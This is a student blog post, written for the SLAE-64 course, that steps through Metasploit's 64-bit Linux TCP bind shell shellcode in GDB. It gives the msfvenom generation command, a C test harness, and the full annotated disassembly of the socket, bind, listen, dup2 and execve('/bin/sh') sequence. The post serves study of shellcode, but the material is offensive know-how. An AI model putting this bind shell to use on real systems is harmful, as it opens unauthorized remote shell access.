
X64 Linux Metasploit TCP Bind Shell Analysis

Aug 3, 2018 | 7 minutes read

Tags: assembly, slae-64, shellcode

This and two other posts will make up the fifth of seven assignments that will comprise my attempt at the SecurityTube Linux Assembly Expert (SLAE-64) certification. Each post will correspond to seven assignments of varying difficulty. I decided to take SLAE-64 to shore up my knowledge of assembly and shellcoding before diving in to OSCE.

Assignment #5 Requirements (Part 1)

  • Choose any three 64-bit shellcode samples created using msfvenom
  • Use a debugger to dissect the functionality of the shellcode
  • Document the analysis

Generate the Shellcode Sample

I started out by generating some shellcode samples. For my first selection, I decided to keep it simple by choosing a TCP bind shell, much like my first assignment. I hoped that this decision would point out areas of improvement in my own shellcode from which I could learn.

 * msfvenom -p linux/x64/shell_bind_tcp -f c
 * No platform was selected, choosing Msf::Module::Platform::Linux from the payload
 * No Arch selected, selecting Arch: x64 from the payload
 * No encoder or badchars specified, outputting raw payload
 * Payload size: 86 bytes
 * Final size of c file: 386 bytes
unsigned char buf[] =

Prep Shellcode for Execution

The next step is to add the shellcode to a shellcode skeleton used for testing then compile the resulting c code into an executable for analysis.

// gcc -fno-stack-protector -z execstack -o shellcode-skeleton shellcode-skeleton.c
#include <stdio.h>
#include <string.h>

unsigned char code[] = \

int main() {
  printf("Shellcode length: %zu\n", strlen(code));
  int (*ret)() = (int(*)())code;

Analysis with GDB

Setting an Initial Breakpoint

The *&code is pointing to our unsigned char array named code in the shellcode skeleton we setup in the previous step.


The Disassembled Code

0x0000555555755020 <+0>:	push   0x29
0x0000555555755022 <+2>:	pop    rax
0x0000555555755023 <+3>:	cdq
0x0000555555755024 <+4>:	push   0x2
0x0000555555755026 <+6>:	pop    rdi
0x0000555555755027 <+7>:	push   0x1
0x0000555555755029 <+9>:	pop    rsi
0x000055555575502a <+10>:	syscall
0x000055555575502c <+12>:	xchg   rdi,rax
0x000055555575502e <+14>:	push   rdx
0x000055555575502f <+15>:	mov    DWORD PTR [rsp],0x5c110002
0x0000555555755036 <+22>:	mov    rsi,rsp
0x0000555555755039 <+25>:	push   0x10
0x000055555575503b <+27>:	pop    rdx
0x000055555575503c <+28>:	push   0x31
0x000055555575503e <+30>:	pop    rax
0x000055555575503f <+31>:	syscall
0x0000555555755041 <+33>:	push   0x32
0x0000555555755043 <+35>:	pop    rax
0x0000555555755044 <+36>:	syscall
0x0000555555755046 <+38>:	xor    rsi,rsi
0x0000555555755049 <+41>:	push   0x2b
0x000055555575504b <+43>:	pop    rax
0x000055555575504c <+44>:	syscall
0x000055555575504e <+46>:	xchg   rdi,rax
0x0000555555755050 <+48>:	push   0x3
0x0000555555755052 <+50>:	pop    rsi
0x0000555555755053 <+51>:	dec    rsi
0x0000555555755056 <+54>:	push   0x21
0x0000555555755058 <+56>:	pop    rax
0x0000555555755059 <+57>:	syscall
0x000055555575505b <+59>:	jne    0x555555755053 <code+51>
0x000055555575505d <+61>:	push   0x3b
0x000055555575505f <+63>:	pop    rax
0x0000555555755060 <+64>:	cdq
0x0000555555755061 <+65>:	movabs rbx,0x68732f6e69622f
0x000055555575506b <+75>:	push   rbx
0x000055555575506c <+76>:	mov    rdi,rsp
0x000055555575506f <+79>:	push   rdx
0x0000555555755070 <+80>:	push   rdi
0x0000555555755071 <+81>:	mov    rsi,rsp
0x0000555555755074 <+84>:	syscall
0x0000555555755076 <+86>:	add    BYTE PTR [rax],al

Socket Syscall

The next breakpoint is set to the socket syscall located at 0x000055555575502a. There’s nothing really out of the ordinary here. The shellcode and register values are on par with what’s expected from previous looks at a bind shell.

push   0x29
pop    rax      ; socket syscall number into rax
cdq             ; use sign extension to zero out rdx
push   0x2
pop    rdi      ; value 2 into rdi (AF_INET)
push   0x1
pop    rsi      ; value 1 into rsi (SOCK_STREAM)
Registers Before Socket Syscall


Registers After Socket Syscall

Noteworthy changes:

  • rax now contains the file descriptor of the newly created socket
  • rdx is still zero


Bind the Socket

The next breakpoint is set to the bind syscall located at 0x000055555575503f. There’s a few things going on here that we’ll discuss. First, the assumption that rdx is still zero. All the information that I could find states that rdx is a caller-save register, meaning that it’s encumbent upon the caller to save the state of that register across procedure calls (syscalls in this case).

Second, msfvenom doesn’t care if null-bytes are present. If you tell the program that you’re concerned about nulls, it will then encode the shellcode to remove those null-bytes (or any other bad character you’re interested in suppressing). If you don’t specify bad characters, msfvenom just cranks out concise shellcode. It’s kind of refreshing that the mental gymnastics of removing nulls isn’t strictly necessary at all times.

Finally, the shellcode here doesn’t care about zero’ing out the entire 16 bytes needed for the sockaddr_in struct. It zeroes out 8 bytes for the port and family but nothing else. Though, it doesn’t appear to carry any negative consequences.

xchg   rdi,rax                      ; put socket's file descriptor into rdi
push   rdx                          ; push 0x0 onto the stack
mov    DWORD PTR [rsp],0x5c110002   ; move the port and AF_INET onto the stack
mov    rsi,rsp                      ; rsi now points to sockaddr_in struct
push   0x10
pop    rdx                          ; value 16 into rdx (length of sockaddr_in)
push   0x31
pop    rax                          ; value 49 into rax (bind syscall #)
Registers Before Bind Syscall


Registers After Bind Syscall

Noteworthy changes:

  • rdi still contains the socket’s file descriptor, meaning it’s available for reuse


Call to Listen

The next breakpoint is set to the listen syscall located at 0x0000555555755044. The only surprising thing to me in this section was that msfvenom disregarded the backlog argument to the listen syscall (int listen(int sockfd, int backlog);). The value of rsi at the time of the syscall was a memory address pointing to our sockaddr_in struct that was used during the bind syscall. I take that to mean that 0x5c110002 (1544617986 in decimal) is passed as the backlog integer.

push   0x32
pop    rax          ; value 50 into rax (listen syscall #)
Registers Before Listen Syscall


Registers After Listen Syscall

Noteworthy changes:

  • rdi still contains the socket’s file descriptor, meaning it’s available for reuse


Call to Accept

The next breakpoint is set to the listen syscall located at 0x000055555575504c. Another surprise to me here was that the shellcode generated zeroed out rsi, which is supposed to be a pointer to 16 bytes of space, and makes the call. No other actions taken… The shellcode did make use of rdx already containing the value of 16 from the call to bind.

xor    rsi,rsi
push   0x2b
pop    rax          ; value 43 into rax (accept syscall #)
Registers Before Accept Syscall


Registers After Accept Syscall

Noteworthy changes:

  • rdi still contains the socket’s file descriptor, meaning it’s available for reuse
  • rax now contains the file descriptor associated with the client’s connection


Duplicate File Descriptors (dup2)

The next breakpoint is set to the dup2 loop’s comparison located at 0x000055555575505b. As expected, there is a tight loop that handles going from 2 to 0 and calling dup2 until STD{IN,OUT,ERR} are all duplicated.

0x000055555575504e <+46>:	xchg   rdi,rax  ; accept returns client to rax, store it back in rdi
0x0000555555755050 <+48>:	push   0x3
0x0000555555755052 <+50>:	pop    rsi      ; loop counter in rsi
0x0000555555755053 <+51>:	dec    rsi      ; 2 -> 1 -> 0
0x0000555555755056 <+54>:	push   0x21
0x0000555555755058 <+56>:	pop    rax      ; value 33 into rax (dup2 syscall)
0x0000555555755059 <+57>:	syscall
0x000055555575505b <+59>:	jne    0x555555755053 <code+51>
Registers Before dup2 Syscall
  • rdi contains the client’s file descriptor


Registers After dup2 Syscall

Noteworthy changes:

  • rsi will decrement from 2 to 0, duplicating the file descriptors necessary to pop a shell


Call to execve /bin/sh

The final breakpoint is set to the execve syscall located at 0x0000555555755074. The generated execve shellcode aligns closely with what is covered as part of the SLAE-64 course. Nothing too out of the ordinary in this section.

0x000055555575505d <+61>:	push   0x3b
0x000055555575505f <+63>:	pop    rax                    ; value 59 into rax (execve syscall)
0x0000555555755060 <+64>:	cdq                           ; zero out rdx via sign extension
0x0000555555755061 <+65>:	movabs rbx,0x68732f6e69622f
0x000055555575506b <+75>:	push   rbx                    ; get /bin/sh on stack
0x000055555575506c <+76>:	mov    rdi,rsp                ; address to /bin/sh in rdi
0x000055555575506f <+79>:	push   rdx                    ; push null
0x0000555555755070 <+80>:	push   rdi                    ; push addr of /bin/sh
0x0000555555755071 <+81>:	mov    rsi,rsp                ; pointer to addr of /bin/sh in rsi
0x0000555555755074 <+84>:	syscall
Registers Before execve Syscall


First Analysis Complete

My main takeaway from this analysis is that reducing the number of opcodes is not the last step to producing small shellcode. The first step should be to write something that works, without any regard to size or bad characters. After that, ways of producing smaller opcodes can be applied. Up until performing this analysis, this is where my process stopped. As a third step, I plan to step through the shellcode again with an eye to where I can make use of existing values in registers to satisfy the requirements of the calls my shellcode is trying to make.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
Student ID: E64-1584
My SLAE-64 Assignments Repository

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